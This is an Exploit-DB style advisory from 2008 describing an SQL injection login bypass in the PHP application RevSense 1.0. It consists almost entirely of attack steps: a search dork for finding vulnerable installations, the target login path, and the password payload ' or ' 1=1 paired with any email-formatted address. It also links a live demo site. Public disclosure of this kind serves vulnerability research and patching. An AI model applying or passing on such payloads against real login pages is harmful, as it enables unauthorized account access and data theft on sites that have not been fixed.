RevSense 1.0 - Authentication Bypass

EDB-ID:

7163


Author:

d3b4g

Type:

webapps


Platform:

PHP

Date:

2008-11-19


###############################################################################################
[-] RevSense v.1.0 (Auth bypass) SQL Injection Vulnerability
[+] Script home : http://www.revsense.com/
[-] Discovered By : d3b4g        
[-] Greetz : str0ke /* All my freind         
################################################################################################
 
 Dork:Powered by Revsense

 Go to www.target.com/index.php?section=user&action=login

 Use following information to bypass login.

 Write any email Address as email address.It must to be in email format.

 For exapmple bla@bla.com

 For password use ' or ' 1=1

 Live demo [at] http://demo.revsense.com/index.php?section=user&action=login
--------------------------------------------
--------------------------------------------
I'm a maldivian 
/*

# milw0rm.com [2008-11-19]